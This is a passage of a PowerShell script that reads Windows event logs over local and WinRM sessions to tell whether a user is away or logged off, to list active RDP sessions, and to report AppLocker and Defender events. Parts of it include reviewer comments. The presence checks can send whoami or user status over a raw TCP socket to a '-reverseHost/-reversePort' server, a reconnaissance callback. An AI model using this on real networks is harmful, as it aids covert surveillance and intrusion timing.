MachineName,TimeGenerated,@{Name="Username";Expression={$_.ReplacementStrings[0]}},@{Name="SID";Expression={$_.ReplacementStrings[2]}},@{Name="Domain";Expression={$_.ReplacementStrings[1]}},@{Name="Client Address";Expression={$_.ReplacementStrings[9]}},@{Name="Client Port";Expression={$_.ReplacementStrings[10]}} | Select-Object -first 1 1351 | } 1352 | catch 1353 | { 1354 | try 1355 | { 
1356 | $getLast4768_count = (Get-EventLog -LogName Security -Instanceid 4768 -ErrorAction Stop).Count 1357 | } 1358 | catch 1359 | { 1360 | $getLast4768_count = 0 1361 | } 1362 | 1363 | Write-Host "[-] " -ForegroundColor Red -NoNewline; Write-Host "You enter $newest but eventID-4768 has $getLast4768_count entries" 1364 | Write-Output "`n" 1365 | } 1366 | 1367 | #4634->An account was logged off 1368 | try 1369 | { 1370 | $getLast4634 = Get-EventLog -LogName Security -Instanceid 4634 -newest $newest -ErrorAction Stop | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property MachineName,TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="SID";Expression={$_.ReplacementStrings[0]}},@{Name="Domain";Expression={$_.ReplacementStrings[2]}} | Select-Object -First 1 1371 | } 1372 | catch 1373 | { 1374 | try 1375 | { 1376 | $getLast4634_count = (Get-EventLog -LogName Security -Instanceid 4634 -ErrorAction Stop).Count 1377 | } 1378 | catch 1379 | { 1380 | $getLast4634_count = 0 1381 | } 1382 | 1383 | Write-Host "[-] " -foregroundcolor Red -Nonewline;Write-Host "You enter $newest but eventID-4634 has $getLast4634_count entries" 1384 | Write-Output "`n" 1385 | 1386 | } 1387 | 1388 | #4800->The workstation was locked 1389 | try 1390 | { 1391 | $getLast4800 = Get-EventLog -LogName Security -Instanceid 4800 -newest $newest -ErrorAction Stop | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[1]}} | Select-Object -first 1 1392 | } 1393 | catch 1394 | { 1395 | try 1396 | { 1397 | $getLast4800_count = (Get-EventLog -LogName Security -Instanceid 4800 -ErrorAction Stop).Count 1398 | } 1399 | catch 1400 | { 1401 | $getLast4800_count = 0 1402 | } 1403 | 1404 | Write-Host "[-] " -foregroundColor Red -Nonewline;Write-Host "You enter $newest but eventID-4800 has $getLast4800_count entries" 1405 | Write-Output "`n" 1406 | } 1407 | 1408 | 
#4672->Special privileges assigned to new logon 1409 | #$getLast4672 = Get-EventLog -LogName Security -Instanceid 4672 -newest $newest | Where {$_.message -match "Account Name:\s*$currentUser"} | Select -property MachineName,TimeGenerated,@{Name="Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="SID";Expression={$_.ReplacementStrings[0]}},@{Name="Domain";Expression={$_.ReplacementStrings[2]}} | select-object -First 1 1410 | #$t4672=$getLast4672.TimeGenerated 1411 | 1412 | #Calculator, Check if any of the event TimeGenerated is null 1413 | 1414 | if($getLast4768.TimeGenerated) 1415 | { 1416 | $t4768=$getLast4768.TimeGenerated 1417 | } 1418 | else 1419 | { 1420 | [datetime]$t4768=0 1421 | 1422 | } 1423 | 1424 | if($getLast4779.TimeGenerated) 1425 | { 1426 | $t4779=$getLast4779.TimeGenerated 1427 | } 1428 | else 1429 | { 1430 | [datetime]$t4779=0 1431 | 1432 | } 1433 | 1434 | if($getLast4634.TimeGenerated) 1435 | { 1436 | $t4634=$getLast4634.TimeGenerated 1437 | } 1438 | else 1439 | { 1440 | [datetime]$t4634=0 1441 | 1442 | } 1443 | 1444 | if($getLast4800.TimeGenerated) 1445 | { 1446 | $t4800=$getLast4800.TimeGenerated 1447 | } 1448 | else 1449 | { 1450 | [datetime]$t4800=0 1451 | 1452 | } 1453 | 1454 | #Get domain form 4779 event, if event is null then get domain from wmi 1455 | if($getLast4779.Domain) 1456 | { 1457 | $domainName=$getLast4779.Domain 1458 | } 1459 | else 1460 | { 1461 | $domainName=(Get-WmiObject Win32_ComputerSystem).Domain 1462 | } 1463 | 1464 | $tmpTime = $t4768-$t4779 1465 | $tmpTime2 = $t4768 - $t4800 1466 | 1467 | 1468 | 1469 | 1470 | if($tmpTime.TotalMilliseconds) 1471 | { 1472 | $p=$tmpTime.TotalMilliseconds 1473 | } 1474 | else 1475 | { 1476 | $p=0 1477 | } 1478 | 1479 | if($tmpTime2.TotalMilliseconds) 1480 | { 1481 | $k=$tmpTime2.TotalMilliseconds 1482 | } 1483 | else 1484 | { 1485 | $k=0 1486 | } 1487 | 1488 | 1489 | if(($p -ge 0) -and ($k -ge 0)) 1490 | { 1491 | 1492 | Write-Host "[-] The workstation is unlocked | User 
$domainName\$currentUser is in!" -ForegroundColor Yellow 1493 | Write-Output "`n" 1494 | } 1495 | else 1496 | { 1497 | Write-Host "[+] The workstation is locked | User $domainName\$currentUser is NOT in!" -ForegroundColor Green 1498 | if(($using:reverseHost -and $using:reversePort) -ne "") 1499 | { 1500 | Invoke-Command -ScriptBlock { 1501 | 1502 | 1503 | $whoami=whoami 1504 | $TcpClient = New-Object System.Net.Sockets.TcpClient 1505 | try 1506 | { 1507 | $Tcpclient.Connect($using:reverseHost,$using:reversePort) 1508 | $t=$Tcpclient.GetStream() 1509 | $data=[System.Text.Encoding]::ASCII.GetBytes($whoami) 1510 | $t.Write($data,0,$data.length) 1511 | 1512 | } 1513 | catch 1514 | { 1515 | Write-Host "No connection could be made with $using:reverseHost on port $using:reversePort" 1516 | } 1517 | 1518 | } 1519 | 1520 | } 1521 | else 1522 | { 1523 | Write-Host "[!] You can provide -reverseHost and -reversePort flags to send the results to the server!" -ForegroundColor Yellow 1524 | Write-Output "`n" 1525 | } 1526 | 1527 | 1528 | 1529 | } 1530 | 1531 | 1532 | <#$sessionConnected=Get-EventLog -LogName Security -Instanceid 4778 -newest 1 | Where {$_.message -match "Account Name:\s*"} 1533 | $sessionConnectedUsername=(Get-EventLog -LogName Security -Instanceid 4778 -newest 1 | Where {$_.message -match "Account Name:\s*"} | Select -property MachineName,@{Name="Username";Expression={$_.ReplacementStrings[0]}}).Username 1534 | $sessionConnectedMachine=(Get-EventLog -LogName Security -Instanceid 4778 -newest 1 | Where {$_.message -match "Account Name:\s*"} | Select -property MachineName).MachineName 1535 | Write-Host "[+] User $sessionDisconnectedMachine\$sessionDisconnectedUsername disconnected from his terminal at"$sessionDisconnected.TimeGenerated"and connected as $sessionConnectedMachine\$sessionConnectedUsername at"$sessionConnected.TimeGenerated -ForegroundColor Green#> 1536 | }#6 1537 | 1538 | 1539 | 1540 | } 1541 | else 1542 | { 1543 | #write-Host "[+] The screen saver 
is invoked -"$eventArray[$x]"/"($eventArray[$x]+1)"event IDs" -ForegroundColor Green 1544 | #write-Host "[+] The workstation is locked / The screen saver is invoked" -ForegroundColor Green 1545 | <#SCREEN SAVER OUTPUT / NOTHING HERE AS OUTPUT#> 1546 | 1547 | 666666 1548 | 1549 | }#5 1550 | 1551 | 1552 | } 1553 | else 1554 | { 1555 | <# NOTHING HERE #> 1556 | }#4 1557 | ##################################################################################################################################################################### 1558 | 1559 | }#3.5 1560 | 1561 | } 1562 | else 1563 | { 1564 | 1565 | Write-Host "[+] User $domainName\$currentUser is logged off" -ForegroundColor Green 1566 | 1567 | if(($using:reverseHost -and $using:reversePort) -ne "") 1568 | { 1569 | Invoke-Command -ScriptBlock { 1570 | 1571 | 1572 | $whoami="$domainName\$currentUser" 1573 | $TcpClient = New-Object System.Net.Sockets.TcpClient 1574 | try 1575 | { 1576 | $Tcpclient.Connect($using:reverseHost,$using:reversePort) 1577 | $t=$Tcpclient.GetStream() 1578 | $data=[System.Text.Encoding]::ASCII.GetBytes($whoami) 1579 | $t.Write($data,0,$data.length) 1580 | 1581 | } 1582 | catch 1583 | { 1584 | Write-Host "No connection could be made with $using:reverseHost on port $using:reversePort" 1585 | } 1586 | 1587 | } 1588 | 1589 | } 1590 | else 1591 | { 1592 | Write-Host "[!] You can provide -reverseHost and -reversePort flags to send the results to the server!" 
-ForegroundColor Yellow
Write-Output "`n"
}


}#3



}
else
{
<# Nothing Here#>

}#2


}#End For



}


# Run RDPCore either locally or inside every open WinRM session.
#   $ip - only the literal "127.0.0.1" selects the local path; any other
#         value is NOT used to pick a session: every PSSession returned by
#         Get-PSSession is targeted, regardless of which host it points to.
# Output is whatever RDPCore writes (Write-Host/Write-Output), nothing is returned.
function RDPConn($ip)
{
    if($ip -eq "127.0.0.1")
    {
        Invoke-Command -ScriptBlock ${function:RDPCore}


    }
    else
    {
        #Get all winRM connections
        $winrmUniqueSessions=Get-PSSession | Get-Unique
        if($winrmUniqueSessions)
        {
            # -le runs the index one past the last element; the null slot is
            # skipped by the if() below rather than by the loop bound.
            for($x=0;$x -le ($winrmUniqueSessions).length;$x++)
            {
                if($winrmUniqueSessions[$x])
                {

                    #Check for active RDP connections using WinRM
                    # ${function:RDPCore} ships the whole function body to the remote side;
                    # it must therefore not rely on any local variable or helper.
                    Invoke-Command -Session (Get-PSSession -Id $winrmUniqueSessions[$x].id) -ScriptBlock ${function:RDPCore}


                }

            }
        }
        else
        {
            Write-Host "[!] No WinRM Session found" -ForegroundColor Red
        }

    }

}

# List RDP sessions that look active on this host, built from the Terminal
# Services operational logs of the last 48 hours:
#   1149 (RemoteConnectionManager) - stored in $AuthSucceded but never read again,
#   21   (LocalSessionManager)     - session logon succeeded  (per $rdpSessLogonSucc),
#   24   (LocalSessionManager)     - session disconnected      (per $rdpUserDisc),
#   25   (LocalSessionManager)     - session reconnected       (per $rdpSessionReconn).
# A session is reported when its latest logon/reconnect (21/25) is newer than its
# latest disconnect (24) and its "Source IP" is not "LOCAL".
# Every query re-reads the whole log with Get-WinEvent and filters client-side,
# so the function is slow on busy hosts; the results are console output only.
# Takes no parameters (it is also invoked remotely through ${function:RDPCore}).
function RDPCore
{


    #Datetime for logs, 2 days before
    $twodaysBefore=Get-date -date $(get-date).adddays(-2)

    #Get today's events - 1149
    # The -notmatch below drops account names ending in "$" (computer accounts)
    # so that machine-to-machine sessions are not reported as users.
    # NOTE(review): $AuthSucceded is not referenced anywhere else in this function.
    $AuthSucceded=Get-WinEvent "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 1149)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,MachineName,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Source IP";Expression={$_.Properties[2].value}}

    #Get today's events - 25, for all users/sessions ids
    # Properties[0]=user, [1]=session id, [2]=source address (same layout assumed for 21/24).
    $rdpSessionReconn=Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 25)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}}# | where {$_."Source IP" -notmatch "LOCAL"}
    #Group todays event - 25 by sessionID to avoid double records
    $grouprdpSessionReconn=(Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 25)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}}<#| where {$_."Source IP" -notmatch "LOCAL"}#>| Group-Object {$_."Session ID"})
    #Create empty array to add last "Reconnected sessions" for every session ID
    $rdpSessionLastReconn = New-Object System.Collections.ArrayList
    #Add dummy line to bypass the problem with 1 entry
    #$rdpSessionLastRecon.Add("") | Out-Null
    #check if the length is only 1
    # A single Group-Object result is a scalar, not an array, hence the two branches.
    if($grouprdpSessionReconn.count -eq 1)
    {

        # Get-WinEvent returns newest first, so "-first 1" is the latest event for that session id.
        $rdpSessionLastReconn.add((Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 25)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,MachineName,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}} <#| where {$_."Source IP" -notmatch "LOCAL"}#> | where {($_."TimeCreated" -as [datetime]) -and ($_."Session ID" -eq $grouprdpSessionReconn.Name)} | select-object -first 1)) | Out-Null

    }
    else
    {
        #Find the latest session for all unique sessionIDs, event - 25 - More than 1 session
        # One full log read per session id; caching $rdpSessionReconn and filtering it
        # in memory would give the same result without re-querying the log.
        for($x=0;$x -lt $grouprdpSessionReconn.length;$x++)
        {

            $rdpSessionLastReconn.add((Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 25)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,MachineName,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}} <#| where {$_."Source IP" -notmatch "LOCAL"}#> | where {($_."TimeCreated" -as [datetime]) -and ($_."Session ID" -eq $grouprdpSessionReconn[$x].Name)} | select-object -first 1)) | Out-Null
        }

    }




    #Get today's events - 24, for all users/sessions ids
    $rdpUserDisc=Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 24)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Source IP";Expression={$_.Properties[2].value}},@{Name="Session ID";Expression={$_.Properties[1].value}}# | where {$_."Source IP" -notmatch "LOCAL"}
    #Group todays event - 24 by sessionID to avoid double records
    $grouprdpUserDisc=(Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 24)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Source IP";Expression={$_.Properties[2].value}},@{Name="Session ID";Expression={$_.Properties[1].value}} <#| where {$_."Source IP" -notmatch "LOCAL"}#> | Group-Object {$_."Session ID"})
    #Create empty aray to add last "Disconnected Sessions" for every session ID

    $rdpSessionLastDisc = New-Object System.Collections.ArrayList
    #Add dummy line to bypass the problem with 1 entry

    #check if the length is 1
    if($grouprdpUserDisc.count -eq 1)
    {
        #$rdpSessionLastDisc.Add("") | Out-Null
        $rdpSessionLastDisc.add((Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 24)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}} <#| where {$_."Source IP" -notmatch "LOCAL"}#> | where {($_."TimeCreated" -as [datetime]) -and ($_."Session ID" -eq $grouprdpUserDisc.Name)} | select-object -first 1)) | Out-Null

    }
    else
    {
        #Find the latest session for all unique session IDs, event - 24 - More than session
        for($x=0;$x -lt $grouprdpUserDisc.length;$x++)
        {
            $rdpSessionLastDisc.add((Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 24)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}} <#| where {$_."Source IP" -notmatch "LOCAL"}#> | where {($_."TimeCreated" -as [datetime]) -and ($_."Session ID" -eq $grouprdpUserDisc[$x].Name)} | select-object -first 1)) | Out-Null
        }
    }



    #Get today's events - 21, for all users/sessions ids
    $rdpSessLogonSucc=Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 21)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Source IP";Expression={$_.Properties[2].value}},@{Name="Session ID";Expression={$_.Properties[1].value}}# | where {$_."Source IP" -notmatch "LOCAL"}
    #Group todays event - 21 by sessionID to avoid double records
    $grouprdpSessLogonSucc=(Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 21)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Source IP";Expression={$_.Properties[2].value}},@{Name="Session ID";Expression={$_.Properties[1].value}}<# | where {$_."Source IP" -notmatch "LOCAL"}#> | Group-Object {$_."Session ID"})
    #Create empty aray to add last "Logon succeeded" entries for every session ID
    $rdpSessLastSucc = New-Object System.Collections.ArrayList
    #Add dummy line into the table to bypass the problem with 1 entry
    #$grouprdpSessLogonSucc.length
    #check if the length of grouped sessions is only 1
    if($grouprdpSessLogonSucc.count -eq 1)
    {

        #$rdpSessLastSucc.add("") | Out-Null
        $rdpSessLastSucc.add((Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 21)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}}<# | where {$_."Source IP" -notmatch "LOCAL"}#> | where {($_."TimeCreated" -as [datetime]) -and ($_."Session ID" -eq $grouprdpSessLogonSucc.Name)} | select-object -first 1)) | Out-Null
    }
    else
    {

        #Expand Group-Object
        # NOTE(review): unlike the 24/25 branches this loops over the expanded
        # (ungrouped) events, so the same "latest 21" can be added once per
        # event of that session; Sort-Object -Unique below collapses duplicates.
        $expandGrouprdpSessLogonSucc=$grouprdpSessLogonSucc | select-object -Expand Group
        #$expandGrouprdpSessLogonSucc.length
        #Find the latest session for all unique session IDs, event - 21 - More than 1 session
        for($x=0;$x -lt $expandGrouprdpSessLogonSucc.length;$x++)
        {

            $rdpSessLastSucc.add((Get-WinEvent "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | where-object {($_.timecreated -ge $twodaysBefore) -and ($_.id -eq 21)} | where {$_.message -notmatch "Remote Desktop Services:\s*\w+\$" } | Select -Property timecreated,@{Name="username";Expression={$_.Properties[0].value}},@{Name="Session ID";Expression={$_.Properties[1].value}},@{Name="Source IP";Expression={$_.Properties[2].value}}<# | where {$_."Source IP" -notmatch "LOCAL"}#> | where {($_."TimeCreated" -as [datetime]) -and ($_."Session ID" -eq $expandGrouprdpSessLogonSucc[$x]."Session ID")} | select-object -first 1)) | Out-Null

        }
    }


    $tmp=$rdpSessLastSucc
    $rdpALLSessArray = New-Object System.Collections.ArrayList


    Write-Output "`n"
    Write-Output "Active RDP Sessions"
    Write-Output "`n"
    #table with active RDP sessions

    # All three loops use -le, so each index also takes the value "count" (one
    # past the end); $tmp[$n] and $rdpSessionLastReconn[$x] are null-guarded,
    # $rdpSessionLastDisc[$y] is not and then simply compares against $null.
    for($x=0;$x -le $rdpSessionLastReconn.count;$x++)
    {

        for($y=0;$y -le $rdpSessionLastDisc.count;$y++)
        {

            for($n=0;$n -le $rdpSessLastSucc.count;$n++)
            {


                #if event id 21 found and disconnection event id 24 is null then a workstation is connected
                #if($rdpSessLastSucc[$n]."Session ID" -eq $rdpSessionLastDisc[$y]."Session ID")
                if($rdpSessionLastDisc)
                {#1

                    #if event 21 exists, successful logon
                    if($tmp[$n])
                    {
                        if($tmp[$n]."Session ID" -eq $rdpSessionLastDisc[$y]."Session ID")
                        {
                            # negative span => the logon is newer than the last disconnect => still connected
                            $totalRDPSession=$rdpSessionLastDisc[$y].TimeCreated-$tmp[$n].TimeCreated



                            if($totalRDPSession.TotalMilliseconds -lt 0)
                            {

                                #Write-Host "[+] " -foregroundColor Green -NoNewline;Write-Host "RDP Session"$rdpSessLastSucc[$n]."Session ID" "| User"$rdpSessLastSucc[$n].username"|"$rdpSessLastSucc[$n]."Source IP" "->"$rdpSessLastSucc[$n].MachineName"@"$rdpSessLastSucc[$n].Timecreated
                                $rdpALLSessArray.Add($tmp[$n]) | Out-Null

                            }
                        }
                    }
                    else
                    {

                        #if event id 25 exists, reconnection
                        if($rdpSessionLastReconn[$x])
                        {
                            if($rdpSessionLastDisc[$y]."Session ID" -eq $rdpSessionLastReconn[$x]."Session ID")
                            {

                                $totalRDPSession=$rdpSessionLastDisc[$y].TimeCreated-$rdpSessionLastReconn[$x].TimeCreated
                                if($totalRDPSession.TotalMilliseconds -lt 0)
                                {

                                    #Write-Host "[+] " -foregroundColor Green -NoNewline;Write-Host "RDP Session"$rdpSessionLastReconn[$x]."Session ID" "| User"$rdpSessionLastReconn[$x].username"|"$rdpSessionLastReconn[$x]."Source IP" "->"$rdpSessionLastReconn[$x].MachineName"@"$rdpSessionLastReconn[$x].Timecreated
                                    $rdpALLSessArray.Add($rdpSessionLastReconn[$x]) | Out-Null
                                }

                            }
                        }

                    }

                }
                else
                {

                    # No disconnect (24) events at all.
                    # NOTE(review): $totalRDPSession is a DateTime here, not a TimeSpan, so
                    # .TotalMilliseconds resolves to $null and the -lt 0 test never holds;
                    # looks like sessions are never reported on this path - confirm intent
                    # (the comment above says a 21 without a 24 should count as connected).
                    $totalRDPSession=$tmp[$n].TimeCreated
                    if($totalRDPSession.TotalMilliseconds -lt 0)
                    {
                        $rdpALLSessArray.Add($tmp[$n]) | Out-Null
                    }


                }#1

            }


        }
    }


    # One entry per session id; duplicates from the nested loops are dropped here.
    $finalRDP=$rdpALLSessArray | sort-object -Property "Session Id" -Unique


    # .count is $null on a scalar in PowerShell 2 (so -lt 1 is true); on newer
    # versions a single object has Count 1 and falls through to the loop below.
    if($finalRDP.count -lt 1)
    {
        if($finalRDP -and ($finalRDP."Source IP" -notmatch "LOCAL"))
        {

            Write-Host "[+] " -foregroundColor Green -NoNewline;Write-Host "RDP Session"$finalRDP."Session ID" "| User"$finalRDP.username"| Source IP:"$finalRDP."Source IP" "|"$finalRDP.Timecreated
        }
        else
        {
            # NOTE(review): no space between "[-] " and -ForegroundColor - confirm it parses as the parameter and not as part of the string.
            Write-Host "[-] "-ForegroundColor Red -NoNewline;Write-Host "No active RDP connections"
        }
    }
    else
    {

        for($x=0; $x -lt $finalRDP.count;$x++)
        {
            # Console (LOCAL) sessions are hidden; only remote sources are printed.
            if($finalRDP[$x]."Source IP" -notmatch "LOCAL")
            {
                Write-Host "[+] " -foregroundColor Green -NoNewline;Write-Host "RDP Session"$finalRDP[$x]."Session ID" "| User"$finalRDP[$x].username"| Source IP:"$finalRDP[$x]."Source IP" "|"$finalRDP[$x].Timecreated
            }
        }

    }



}


#https://powershell.org/forums/topic/runas-command-to-run-a-script-under-alternate-user-credentials/
# Run logQuery (defined elsewhere in this file) on a remote host over WinRM
# with explicit credentials.
#   $user, $pass - account used for the remote session; $pass is received in
#                  clear text and only wrapped into a SecureString here, so it
#                  is exposed in the caller's command line, history and any
#                  transcript - prefer Get-Credential when interactive.
#   $ip          - target passed to -ComputerName.
#   $eventID, $newest, $users - forwarded unchanged to logQuery; $newest falls
#                  back to 100 when empty or unset.
# Both branches issue the identical Invoke-Command; only the default differs.
function RunAS($user,$pass,$ip,$eventID,$newest,$users)
{

    $PasswordSS = ConvertTo-SecureString -String $pass -AsPlainText -Force
    $Creds = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $user,$PasswordSS
    if(($newest -eq '') -or !$newest)
    {
        $newest = 100 #RunAs $newest default value
        Invoke-Command -ComputerName $ip -Credential $Creds -ScriptBlock ${function:logQuery} -ArgumentList $eventID,$newest,$users
    }
    else
    {
        Invoke-Command -ComputerName $ip -Credential $Creds -ScriptBlock ${function:logQuery} -ArgumentList $eventID,$newest,$users
    }
}


# Return every fine-grained password policy in the domain.
# Needs the ActiveDirectory module (RSAT) and read access to the policies;
# the output is the raw Get-ADFineGrainedPasswordPolicy objects.
function Get-FinePasswordPolicy
{

    Import-Module ActiveDirectory
    Get-ADFineGrainedPasswordPolicy -Filter { name -like '*' }

}

# Print AppLocker block events from the local AppLocker logs.
#   $eventID        - "8004" reads the "EXE and DLL" log; ANY other value reads
#                     the "MSI and Script" log and filters on that id, but the
#                     header printed always says 8007.
#   $LogCreatedDate - optional; when given, only events whose TimeCreated date
#                     equals it are shown (the header is printed even if none match).
# -ErrorAction Stop turns a missing/empty log into the "[-] No logs" message.
# Output is written with Write-Host plus the event objects on the pipeline.
function ApplockerLogs
{
    [CmdletBinding()]
    Param([string]$eventID,[datetime]$LogCreatedDate)



    if($eventID -eq "8004")
    {
        try
        {
            $eventID8004=Get-winEvent -Logname "Microsoft-Windows-applocker/EXE and DLL" -ErrorAction Stop | Select TimeCreated,ProviderName,id,Message,UserID | Where-Object {$_.id -eq $eventID}
            if((!$LogCreatedDate) -and (($eventID8004).Count -gt 0))
            {
                Write-Host "[+] Applocker event (8004) - *.exe, *.com, *.dll, *.ocx"
                $eventID8004

            }
            else
            {
                Write-Host "[+] Applocker event (8004) - *.exe, *.com, *.dll, *.ocx"
                $eventID8004 | where-object {($_.TimeCreated).date -eq $LogCreatedDate}
            }
        }
        catch
        {
            Write-Output "[-] No logs - Applocker event (8004)"
        }
    }
    else
    {

        try
        {
            # "$eventID" is compared as a string here, $eventID as-is above; both
            # work because PowerShell converts the right-hand side to the id's type.
            $eventID8007=Get-winEvent -Logname "Microsoft-Windows-applocker/MSI and Script" -ErrorAction Stop | Select TimeCreated,ProviderName,id,Message,UserID | Where-Object {$_.id -eq "$eventID"}
            if((!$LogCreatedDate) -and (($eventID8007).Count -gt 0))
            {
                Write-Host "[+] Applocker event (8007) - *.js, *.ps1, *.vbs, *.cmd, *.bat, *.si, *.msp"
                $eventID8007
            }
            else
            {
                Write-Host "[+] Applocker event (8007) - *.js, *.ps1, *.vbs, *.cmd, *.bat, *.si, *.msp"
                $eventID8007 | where-object {($_.TimeCreated).date -eq $LogCreatedDate}
            }

        }
        catch
        {
            Write-Output "[-] No logs - Applocker (8007)"
        }
    }
}

# Print Windows Defender detections joined with the matching threat catalogue entry.
# Uses the Defender cmdlets Get-MpThreatDetection (per-detection data) and
# Get-MpThreat (per-threat data) and joins them on ThreatID.
# NOTE(review): the join is positional - the i-th sorted ThreatID of the detection
# list is compared with the i-th sorted ThreatID of the threat list - so a ThreatID
# present in only one of the two lists shifts the alignment and later pairs may be
# skipped; a lookup by ThreatID would be the robust form.
# Takes no parameters; output is console text only.
function WindowsDefender
{
    $mpTD=Get-MpThreatDetection | Select ActionSuccess,AMProductVersion,InitialDetectionTime,ProcessName,RemediationTime,ThreatID,DomainUser
    $mpT=Get-MPThreat | Select DidThreatExecute,Resources,ThreatID,ThreatName,SeverityID,PSComputerName
    $group_mpTD=$mpTD | Group-Object -Property ThreatID

    $group_mpTD_sort=$group_mpTD.Name | Sort-Object
    $mpT_sort=$mpT.ThreatID | Sort-Object

    for($i=0; $i -lt $mpT_sort.count;$i++)
    {
        if($group_mpTD_sort[$i] -eq $mpT_sort[$i])
        {
            # Several detections can share one ThreatID; the Write-Host lines then
            # print the whole collection for each property.
            $threatDetection=$mpTD | where-object {$_.ThreatID -eq $group_mpTD_sort[$i]}
            $threat=$mpT | where-object {$_.ThreatID -eq $group_mpTD_sort[$i]}

            Write-Host "Action Success: "$threatDetection.ActionSuccess
            Write-Host "AMProductVersion: "$threatDetection.AMProductVersion
            Write-Host "InitialDetectionTime: "$threatDetection.InitialDetectionTime
            Write-Host "ProcessName: "$threatDetection.ProcessName
            Write-Host "RemediationTime: "$threatDetection.RemediationTime
            Write-Host "DidThreatExecute: "$threat.DidThreatExecute
            Write-Host "DomainUser: "$threatDetection.DomainUser
            Write-Host "Resources: "$threat.Resources
            Write-Host "ThreatName: "$threat.ThreatName
            Write-Host "Severity: "$threat.SeverityID
            Write-Host "ThreatID: "$threat.ThreatID
            Write-Output "`n"
        }

    }

}

#Create Functions

#Get ObjectGUID
#Example->Get-ADObject -Identity D4429A86-CE1E-48E3-8CFF-E391397DA168

#Translate Security Descriptor to human-readable form